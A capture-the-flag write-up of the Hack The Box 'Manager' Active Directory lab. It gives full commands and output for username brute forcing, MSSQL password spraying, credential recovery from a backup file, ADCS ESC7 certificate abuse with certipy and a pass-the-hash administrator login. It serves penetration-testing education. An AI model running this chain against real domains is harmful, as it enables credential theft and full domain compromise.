Manager was a medium AD box with no web server. The box starts with brute forcing Kerberos usernames leading to MSSQL access. With the MSSQL access, it will get you the backup file with creds which can be used to log in via evil-winrm. The escalation is done using ESC7 ADCS vulnerability.
Enumeration
Nmap showed 12 ports
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 18:57:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
Port 80 was static with no functionalities to interact with and useless directory bruting results.
Being an AD box, I enumerated using SMB, LDAP, RPC and impacket scripts, unfortunately, those were unsuccessful without any username and password.
Bruteforcing
Bruteforcing can be done in two ways, RID bruteforcing and username bruteforcing. Cracmapexec and kerbrute are tools that can be utilized for bruteforcing. Crackmapexec is not longer maintained, its latest alternative is netexec.
Relative identifier (RID) is a variable length number that is assigned to objects at creation and becomes part of the object’s Security Identifier (SID) that uniquely identifies an account or group within a domain.
RID Bruteforcing using crackmapexec
$ crackmapexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000
RID Bruteforcing using netexec
$ netexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000
Note: The username parameter can be any random value, a username that doesn’t exist will work here. The number 10000 is the maximum number of RIDs to bruteforce
Crackmapexec Results
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
Username Bruteforcing using kerbrute
$ kerbrute userenum -d manager.htb /usr/share/wordlist/xato-net-10-million-usernames.txt --dc dc01.manager.htb
Results
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]
Since kerbrute is executed with a 10-million list, it took around 10 minutes to complete and crackmapexec was completed within 2 minutes. It is advised to use multiple tools for performing the same thing against an AD environment.
Accessing MSSQL
Use the results from crackmapexec to authenticate the MSSQL service. If you don’t have the passwords, use the same list for the username and password. The below command identified operator as a valid user with operator as a password.
MSSQL Username Enumeration
$ crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-bruteforce
Accessing MSSQL
Use the same creds, with impacket’s mssqlclient.py to access the MSSQL service. I couldn’t identify any valid information from the databases, or even crack the ntlmv2 hash. Enumerating the wwwroot using xp_dirtree gave a backupfile.
$ mssqlclient.py manager.htb/operator:[email protected] -windows-auth
SQL (MANAGER\Operator guest@master)> EXEC xp_dirtree "C:\inetpub\wwwroot", 1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
xp_dirtree is an extended stored procedure in SQL Server that is used to retrieve a hierarchical listing of folders and files in a specified directory. Syntax :
xp_dirtree 'directory_path', [,'depth']
Exploiting
Shell as Raven
Download the backup file from http://manager.htb/website-backup-27-07-23-old.zip and unzip. The credentials for user raven were in a hidden XML.
<access-user>
<user>[email protected]</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
I grabbed a shell with evil-winrm to get the user.txt
$ evil-winrm -u raven -i manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
With a valid user and password, I tried impacket scripts to find any (ASREP/Kerbe)Roastable accounts, which was unsuccessful. Valid creds give you more possibilities to enumerate, and there I tried enumerating the certificates of the domain.
$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target manager.htb -text -stdout -vulnerable
This enumeration can also be done from the vulnerable machine with certify.exe. Ceritpy couldn’t identify a vulnerable certificate, however, it found an ESC7 vulnerability.
[snip]
...
..
.
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
ESC7 vulnerability is technically explained in certipy GitHub repo.
The user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. The Manage CA access right can fulfil these prerequisites.
The technique relies on the fact that users with the Manage CA and Manage Certificates access rights can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enrol in the template. Thus, a user can request to enrol in the SubCA - which will be denied - but then issued by the manager afterwards.
~ Certipy GitHub
Fetching certificates
Multiple steps were involved in escalating to Administrator user.
- Grant raven the
Manage Certificatesaccess right by adding your user as a new officer.
$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
- Request a certificate based on the SubCA template. This request will be denied, but save the private key and note down the request ID.
$ certipy req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn [email protected]
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enrol for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
- Issue the failed certificate request with the ca command and the
-issue-request <request ID>parameter.
$ certipy ca -ca "manager-DC01-CA" -issue-request 13 -username '[email protected]' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
- Retrieve the issued certificate with the req command and the
-retrieve <request ID>parameter.
$ certipy req -username '[email protected]' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 13
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
Shell as Administrator
- Fetch Admin Hash.
$ sudo ntpdate -u manager.htb #Resolve clock skew
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Note: certipy triggered Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) while authenticating using certipy, it was because of the local time of the attacking machine. Time was synchronised with the DC using ntpdate.
- Login as Administrator.
$ evil-winrm -u administrator -i manager.htb -H ae5064c2f62317332c88629e025924ef #Shell as Administrator